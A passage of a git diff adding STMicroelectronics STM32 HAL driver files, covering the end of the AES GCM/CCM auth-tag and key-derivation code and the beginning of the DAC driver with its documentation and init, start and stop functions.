AES_CR_GCMPH, CRYP_PHASE_FINAL); + + /* Write the number of bits in header (64 bits) followed by the number of bits + in the payload */ + if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = __RBIT((uint32_t)(headerlength)); + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = __RBIT((uint32_t)(inputlength)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = __REV((uint32_t)(headerlength)); + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = __REV((uint32_t)(inputlength)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = __ROR((uint32_t)headerlength, 16U); + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = __ROR((uint32_t)inputlength, 16U); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_32B) + { + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = (uint32_t)(headerlength); + hcryp->Instance->DINR = 0U; + hcryp->Instance->DINR = (uint32_t)(inputlength); + } + else + { + /* Nothing to do */ + } + /* Wait for CCF flag to be raised */ + tickstart = HAL_GetTick(); + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + /* Read the authentication TAG in the output FIFO */ + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + +#endif /* End AES or CRYP */ + + /* Disable the peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + return HAL_ERROR; + } + /* Return function status */ + return HAL_OK; +} + +/** + * @brief AES CCM Authentication TAG generation. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param AuthTag: Pointer to the authentication buffer + * @param Timeout: Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYPEx_AESCCM_GenerateAuthTAG(CRYP_HandleTypeDef *hcryp, uint32_t *AuthTag, uint32_t Timeout) +{ + uint32_t tagaddr = (uint32_t)AuthTag; + uint32_t ctr0 [4] = {0}; + uint32_t ctr0addr = (uint32_t)ctr0; + uint32_t tickstart; + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Check if initialization phase has already been performed */ + if (hcryp->Phase == CRYPEx_PHASE_PROCESS) + { + /* Change the CRYP phase */ + hcryp->Phase = CRYPEx_PHASE_FINAL; + } + else /* Initialization phase has not been performed*/ + { + /* Disable the peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Sequence error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_AUTH_TAG_SEQUENCE; + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + +#if defined(CRYP) + + /* Disable CRYP to start the final phase */ + __HAL_CRYP_DISABLE(hcryp); + + /* Select final phase & ALGODIR bit must be set to 0. */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_GCM_CCMPH | CRYP_CR_ALGODIR, CRYP_PHASE_FINAL | CRYP_OPERATINGMODE_ENCRYPT); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /* Write the counter block in the IN FIFO, CTR0 information from B0 + data has to be swapped according to the DATATYPE*/ + ctr0[0] = (hcryp->Init.B0[0]) & CRYP_CCM_CTR0_0; + ctr0[1] = hcryp->Init.B0[1]; + ctr0[2] = hcryp->Init.B0[2]; + ctr0[3] = hcryp->Init.B0[3] & CRYP_CCM_CTR0_3; + + if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + hcryp->Instance->DIN = __REV(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DIN = __REV(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DIN = __REV(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DIN = __REV(*(uint32_t *)(ctr0addr)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + hcryp->Instance->DIN = __ROR(*(uint32_t *)(ctr0addr), 16U); + ctr0addr += 4U; + hcryp->Instance->DIN = __ROR(*(uint32_t *)(ctr0addr), 16U); + ctr0addr += 4U; + hcryp->Instance->DIN = __ROR(*(uint32_t *)(ctr0addr), 16U); + ctr0addr += 4U; + hcryp->Instance->DIN = __ROR(*(uint32_t *)(ctr0addr), 16U); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(ctr0addr)); + } + else + { + hcryp->Instance->DIN = *(uint32_t *)(ctr0addr); + ctr0addr += 4U; + hcryp->Instance->DIN = *(uint32_t *)(ctr0addr); + ctr0addr += 4U; + hcryp->Instance->DIN = *(uint32_t *)(ctr0addr); + ctr0addr += 4U; + hcryp->Instance->DIN = *(uint32_t *)(ctr0addr); + } + /* Wait for OFNE flag to be raised */ + tickstart = HAL_GetTick(); + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_OFNE)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral Clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + /* Read the Auth TAG in the IN FIFO */ + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + +#else /* AES */ + + /* Select final phase */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_GCMPH, CRYP_PHASE_FINAL); + + /* Write the counter block in the IN FIFO, CTR0 information from B0 + data has to be swapped according to the DATATYPE*/ + if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + ctr0[0] = (__REV(hcryp->Init.B0[0]) & CRYP_CCM_CTR0_0); + ctr0[1] = __REV(hcryp->Init.B0[1]); + ctr0[2] = __REV(hcryp->Init.B0[2]); + ctr0[3] = (__REV(hcryp->Init.B0[3])& CRYP_CCM_CTR0_3); + + hcryp->Instance->DINR = __REV(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DINR = __REV(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DINR = __REV(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DINR = __REV(*(uint32_t *)(ctr0addr)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + ctr0[0] = (__ROR((hcryp->Init.B0[0]), 16U)& CRYP_CCM_CTR0_0); + ctr0[1] = __ROR((hcryp->Init.B0[1]), 16U); + ctr0[2] = __ROR((hcryp->Init.B0[2]), 16U); + ctr0[3] = (__ROR((hcryp->Init.B0[3]), 16U)& CRYP_CCM_CTR0_3); + + hcryp->Instance->DINR = __ROR(*(uint32_t *)(ctr0addr), 16U); + ctr0addr += 4U; + hcryp->Instance->DINR = __ROR(*(uint32_t *)(ctr0addr), 16U); + ctr0addr += 4U; + hcryp->Instance->DINR = __ROR(*(uint32_t *)(ctr0addr), 16U); + ctr0addr += 4U; + hcryp->Instance->DINR = __ROR(*(uint32_t *)(ctr0addr), 16U); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + ctr0[0] = (__RBIT(hcryp->Init.B0[0])& CRYP_CCM_CTR0_0); + ctr0[1] = __RBIT(hcryp->Init.B0[1]); + ctr0[2] = __RBIT(hcryp->Init.B0[2]); + ctr0[3] = (__RBIT(hcryp->Init.B0[3])& CRYP_CCM_CTR0_3); + + hcryp->Instance->DINR = __RBIT(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DINR = __RBIT(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DINR = __RBIT(*(uint32_t *)(ctr0addr)); + ctr0addr += 4U; + hcryp->Instance->DINR = __RBIT(*(uint32_t *)(ctr0addr)); + } + else + { + ctr0[0] = (hcryp->Init.B0[0]) & CRYP_CCM_CTR0_0; + ctr0[1] = hcryp->Init.B0[1]; + ctr0[2] = hcryp->Init.B0[2]; + ctr0[3] = hcryp->Init.B0[3] & CRYP_CCM_CTR0_3; + + hcryp->Instance->DINR = *(uint32_t *)(ctr0addr); + ctr0addr += 4U; + hcryp->Instance->DINR = *(uint32_t *)(ctr0addr); + ctr0addr += 4U; + hcryp->Instance->DINR = *(uint32_t *)(ctr0addr); + ctr0addr += 4U; + hcryp->Instance->DINR = *(uint32_t *)(ctr0addr); + } + + /* Wait for CCF flag to be raised */ + tickstart = HAL_GetTick(); + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral Clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + /* Read the authentication TAG in the output FIFO */ + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUTR; + + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + +#endif /* End of AES || CRYP */ + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + } + else + { + /* Busy error code field */ + hcryp->ErrorCode = HAL_CRYP_ERROR_BUSY; + return HAL_ERROR; + } + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +#if defined (AES) +/** @defgroup CRYPEx_Exported_Functions_Group2 Key Derivation functions + * @brief AutoKeyDerivation functions + * +@verbatim + ============================================================================== + ##### Key Derivation functions ##### + ============================================================================== + [..] This section provides functions allowing to Enable or Disable the + the AutoKeyDerivation parameter in CRYP_HandleTypeDef structure + These function are allowed only in TinyAES IP. + +@endverbatim + * @{ + */ + +/** + * @brief AES enable key derivation functions + * @param hcryp: pointer to a CRYP_HandleTypeDef structure. + * @retval None + */ +void HAL_CRYPEx_EnableAutoKeyDerivation(CRYP_HandleTypeDef *hcryp) +{ + if (hcryp->State == HAL_CRYP_STATE_READY) + { + hcryp->AutoKeyDerivation = ENABLE; + } + else + { + /* Busy error code field */ + hcryp->ErrorCode = HAL_CRYP_ERROR_BUSY; + } +} +/** + * @brief AES disable key derivation functions + * @param hcryp: pointer to a CRYP_HandleTypeDef structure. + * @retval None + */ +void HAL_CRYPEx_DisableAutoKeyDerivation(CRYP_HandleTypeDef *hcryp) +{ + if (hcryp->State == HAL_CRYP_STATE_READY) + { + hcryp->AutoKeyDerivation = DISABLE; + } + else + { + /* Busy error code field */ + hcryp->ErrorCode = HAL_CRYP_ERROR_BUSY; + } +} + +/** + * @} + */ +#endif /* AES or GCM CCM defined*/ +#endif /* AES */ +#endif /* HAL_CRYP_MODULE_ENABLED */ + +/** + * @} + */ +#endif /* TinyAES or CRYP*/ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dac.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dac.c new file mode 100644 index 000000000..5efc497f7 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dac.c @@ -0,0 +1,1342 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dac.c + * @author MCD Application Team + * @brief DAC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Digital to Analog Converter (DAC) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + * + * + @verbatim + ============================================================================== + ##### DAC Peripheral features ##### + ============================================================================== + [..] + *** DAC Channels *** + ==================== + [..] + STM32F4 devices integrate two 12-bit Digital Analog Converters + + The 2 converters (i.e. channel1 & channel2) + can be used independently or simultaneously (dual mode): + (#) DAC channel1 with DAC_OUT1 (PA4) as output + (#) DAC channel2 with DAC_OUT2 (PA5) as output + + *** DAC Triggers *** + ==================== + [..] + Digital to Analog conversion can be non-triggered using DAC_TRIGGER_NONE + and DAC_OUT1/DAC_OUT2 is available once writing to DHRx register. + [..] + Digital to Analog conversion can be triggered by: + (#) External event: EXTI Line 9 (any GPIOx_PIN_9) using DAC_TRIGGER_EXT_IT9. + The used pin (GPIOx_PIN_9) must be configured in input mode. + + (#) Timers TRGO: TIM2, TIM4, TIM5, TIM6, TIM7 and TIM8 + (DAC_TRIGGER_T2_TRGO, DAC_TRIGGER_T4_TRGO...) + + (#) Software using DAC_TRIGGER_SOFTWARE + + *** DAC Buffer mode feature *** + =============================== + [..] + Each DAC channel integrates an output buffer that can be used to + reduce the output impedance, and to drive external loads directly + without having to add an external operational amplifier. + To enable, the output buffer use + sConfig.DAC_OutputBuffer = DAC_OUTPUTBUFFER_ENABLE; + [..] + (@) Refer to the device datasheet for more details about output + impedance value with and without output buffer. + + *** DAC wave generation feature *** + =================================== + [..] + Both DAC channels can be used to generate + (#) Noise wave + (#) Triangle wave + + *** DAC data format *** + ======================= + [..] + The DAC data format can be: + (#) 8-bit right alignment using DAC_ALIGN_8B_R + (#) 12-bit left alignment using DAC_ALIGN_12B_L + (#) 12-bit right alignment using DAC_ALIGN_12B_R + + *** DAC data value to voltage correspondence *** + ================================================ + [..] + The analog output voltage on each DAC channel pin is determined + by the following equation: + [..] + DAC_OUTx = VREF+ * DOR / 4095 + (+) with DOR is the Data Output Register + [..] + VREF+ is the input voltage reference (refer to the device datasheet) + [..] + e.g. To set DAC_OUT1 to 0.7V, use + (+) Assuming that VREF+ = 3.3V, DAC_OUT1 = (3.3 * 868) / 4095 = 0.7V + + *** DMA requests *** + ===================== + [..] + A DMA request can be generated when an external trigger (but not a software trigger) + occurs if DMA1 requests are enabled using HAL_DAC_Start_DMA(). + DMA1 requests are mapped as following: + (#) DAC channel1 mapped on DMA1 Stream5 channel7 which must be + already configured + (#) DAC channel2 mapped on DMA1 Stream6 channel7 which must be + already configured + + [..] + (@) For Dual mode and specific signal (Triangle and noise) generation please + refer to Extended Features Driver description + + ##### How to use this driver ##### + ============================================================================== + [..] + (+) DAC APB clock must be enabled to get write access to DAC + registers using HAL_DAC_Init() + (+) Configure DAC_OUTx (DAC_OUT1: PA4, DAC_OUT2: PA5) in analog mode. + (+) Configure the DAC channel using HAL_DAC_ConfigChannel() function. + (+) Enable the DAC channel using HAL_DAC_Start() or HAL_DAC_Start_DMA() functions. + + + *** Polling mode IO operation *** + ================================= + [..] + (+) Start the DAC peripheral using HAL_DAC_Start() + (+) To read the DAC last data output value, use the HAL_DAC_GetValue() function. + (+) Stop the DAC peripheral using HAL_DAC_Stop() + + *** DMA mode IO operation *** + ============================== + [..] + (+) Start the DAC peripheral using HAL_DAC_Start_DMA(), at this stage the user specify the length + of data to be transferred at each end of conversion + First issued trigger will start the conversion of the value previously set by HAL_DAC_SetValue(). + (+) At the middle of data transfer HAL_DAC_ConvHalfCpltCallbackCh1() or HAL_DACEx_ConvHalfCpltCallbackCh2() + function is executed and user can add his own code by customization of function pointer + HAL_DAC_ConvHalfCpltCallbackCh1() or HAL_DACEx_ConvHalfCpltCallbackCh2() + (+) At The end of data transfer HAL_DAC_ConvCpltCallbackCh1() or HAL_DACEx_ConvHalfCpltCallbackCh2() + function is executed and user can add his own code by customization of function pointer + HAL_DAC_ConvCpltCallbackCh1() or HAL_DACEx_ConvHalfCpltCallbackCh2() + (+) In case of transfer Error, HAL_DAC_ErrorCallbackCh1() function is executed and user can + add his own code by customization of function pointer HAL_DAC_ErrorCallbackCh1 + (+) In case of DMA underrun, DAC interruption triggers and execute internal function HAL_DAC_IRQHandler. + HAL_DAC_DMAUnderrunCallbackCh1() or HAL_DACEx_DMAUnderrunCallbackCh2() + function is executed and user can add his own code by customization of function pointer + HAL_DAC_DMAUnderrunCallbackCh1() or HAL_DACEx_DMAUnderrunCallbackCh2() and + add his own code by customization of function pointer HAL_DAC_ErrorCallbackCh1() + (+) Stop the DAC peripheral using HAL_DAC_Stop_DMA() + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_DAC_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions HAL_DAC_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) ConvCpltCallbackCh1 : callback when a half transfer is completed on Ch1. + (+) ConvHalfCpltCallbackCh1 : callback when a transfer is completed on Ch1. + (+) ErrorCallbackCh1 : callback when an error occurs on Ch1. + (+) DMAUnderrunCallbackCh1 : callback when an underrun error occurs on Ch1. + (+) ConvCpltCallbackCh2 : callback when a half transfer is completed on Ch2. + (+) ConvHalfCpltCallbackCh2 : callback when a transfer is completed on Ch2. + (+) ErrorCallbackCh2 : callback when an error occurs on Ch2. + (+) DMAUnderrunCallbackCh2 : callback when an underrun error occurs on Ch2. + (+) MspInitCallback : DAC MspInit. + (+) MspDeInitCallback : DAC MspdeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function HAL_DAC_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) ConvCpltCallbackCh1 : callback when a half transfer is completed on Ch1. + (+) ConvHalfCpltCallbackCh1 : callback when a transfer is completed on Ch1. + (+) ErrorCallbackCh1 : callback when an error occurs on Ch1. + (+) DMAUnderrunCallbackCh1 : callback when an underrun error occurs on Ch1. + (+) ConvCpltCallbackCh2 : callback when a half transfer is completed on Ch2. + (+) ConvHalfCpltCallbackCh2 : callback when a transfer is completed on Ch2. + (+) ErrorCallbackCh2 : callback when an error occurs on Ch2. + (+) DMAUnderrunCallbackCh2 : callback when an underrun error occurs on Ch2. + (+) MspInitCallback : DAC MspInit. + (+) MspDeInitCallback : DAC MspdeInit. + (+) All Callbacks + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the HAL_DAC_Init and if the state is HAL_DAC_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_DAC_Init + and HAL_DAC_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_DAC_Init and HAL_DAC_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_DAC_RegisterCallback before calling HAL_DAC_DeInit + or HAL_DAC_Init function. + + When The compilation define USE_HAL_DAC_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + *** DAC HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in DAC HAL driver. + + (+) __HAL_DAC_ENABLE : Enable the DAC peripheral + (+) __HAL_DAC_DISABLE : Disable the DAC peripheral + (+) __HAL_DAC_CLEAR_FLAG: Clear the DAC's pending flags + (+) __HAL_DAC_GET_FLAG: Get the selected DAC's flag status + + [..] + (@) You can refer to the DAC HAL driver header file for more useful macros + +@endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_DAC_MODULE_ENABLED +#if defined(DAC) + +/** @defgroup DAC DAC + * @brief DAC driver modules + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions -------------------------------------------------------*/ + +/** @defgroup DAC_Exported_Functions DAC Exported Functions + * @{ + */ + +/** @defgroup DAC_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the DAC. + (+) De-initialize the DAC. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the DAC peripheral according to the specified parameters + * in the DAC_InitStruct and initialize the associated handle. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_Init(DAC_HandleTypeDef *hdac) +{ + /* Check DAC handle */ + if (hdac == NULL) + { + return HAL_ERROR; + } + /* Check the parameters */ + assert_param(IS_DAC_ALL_INSTANCE(hdac->Instance)); + + if (hdac->State == HAL_DAC_STATE_RESET) + { +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + /* Init the DAC Callback settings */ + hdac->ConvCpltCallbackCh1 = HAL_DAC_ConvCpltCallbackCh1; + hdac->ConvHalfCpltCallbackCh1 = HAL_DAC_ConvHalfCpltCallbackCh1; + hdac->ErrorCallbackCh1 = HAL_DAC_ErrorCallbackCh1; + hdac->DMAUnderrunCallbackCh1 = HAL_DAC_DMAUnderrunCallbackCh1; +#if defined(DAC_CHANNEL2_SUPPORT) + hdac->ConvCpltCallbackCh2 = HAL_DACEx_ConvCpltCallbackCh2; + hdac->ConvHalfCpltCallbackCh2 = HAL_DACEx_ConvHalfCpltCallbackCh2; + hdac->ErrorCallbackCh2 = HAL_DACEx_ErrorCallbackCh2; + hdac->DMAUnderrunCallbackCh2 = HAL_DACEx_DMAUnderrunCallbackCh2; +#endif /* DAC_CHANNEL2_SUPPORT */ + if (hdac->MspInitCallback == NULL) + { + hdac->MspInitCallback = HAL_DAC_MspInit; + } +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + + /* Allocate lock resource and initialize it */ + hdac->Lock = HAL_UNLOCKED; + +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + /* Init the low level hardware */ + hdac->MspInitCallback(hdac); +#else + /* Init the low level hardware */ + HAL_DAC_MspInit(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + } + + /* Initialize the DAC state*/ + hdac->State = HAL_DAC_STATE_BUSY; + + /* Set DAC error code to none */ + hdac->ErrorCode = HAL_DAC_ERROR_NONE; + + /* Initialize the DAC state*/ + hdac->State = HAL_DAC_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Deinitialize the DAC peripheral registers to their default reset values. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_DeInit(DAC_HandleTypeDef *hdac) +{ + /* Check DAC handle */ + if (hdac == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_DAC_ALL_INSTANCE(hdac->Instance)); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + if (hdac->MspDeInitCallback == NULL) + { + hdac->MspDeInitCallback = HAL_DAC_MspDeInit; + } + /* DeInit the low level hardware */ + hdac->MspDeInitCallback(hdac); +#else + /* DeInit the low level hardware */ + HAL_DAC_MspDeInit(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + + /* Set DAC error code to none */ + hdac->ErrorCode = HAL_DAC_ERROR_NONE; + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hdac); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initialize the DAC MSP. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DAC_MspInit(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DAC_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the DAC MSP. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DAC_MspDeInit(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DAC_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup DAC_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Start conversion. + (+) Stop conversion. + (+) Start conversion and enable DMA transfer. + (+) Stop conversion and disable DMA transfer. + (+) Get result of conversion. + +@endverbatim + * @{ + */ + +/** + * @brief Enables DAC and starts conversion of channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_Start(DAC_HandleTypeDef *hdac, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + + /* Process locked */ + __HAL_LOCK(hdac); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + + /* Enable the Peripheral */ + __HAL_DAC_ENABLE(hdac, Channel); + + if (Channel == DAC_CHANNEL_1) + { + /* Check if software trigger enabled */ + if ((hdac->Instance->CR & (DAC_CR_TEN1 | DAC_CR_TSEL1)) == DAC_TRIGGER_SOFTWARE) + { + /* Enable the selected DAC software conversion */ + SET_BIT(hdac->Instance->SWTRIGR, DAC_SWTRIGR_SWTRIG1); + } + } +#if defined(DAC_CHANNEL2_SUPPORT) + else + { + /* Check if software trigger enabled */ + if ((hdac->Instance->CR & (DAC_CR_TEN2 | DAC_CR_TSEL2)) == (DAC_TRIGGER_SOFTWARE << (Channel & 0x10UL))) + { + /* Enable the selected DAC software conversion*/ + SET_BIT(hdac->Instance->SWTRIGR, DAC_SWTRIGR_SWTRIG2); + } + } +#endif /* DAC_CHANNEL2_SUPPORT */ + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdac); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disables DAC and stop conversion of channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_Stop(DAC_HandleTypeDef *hdac, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + + /* Disable the 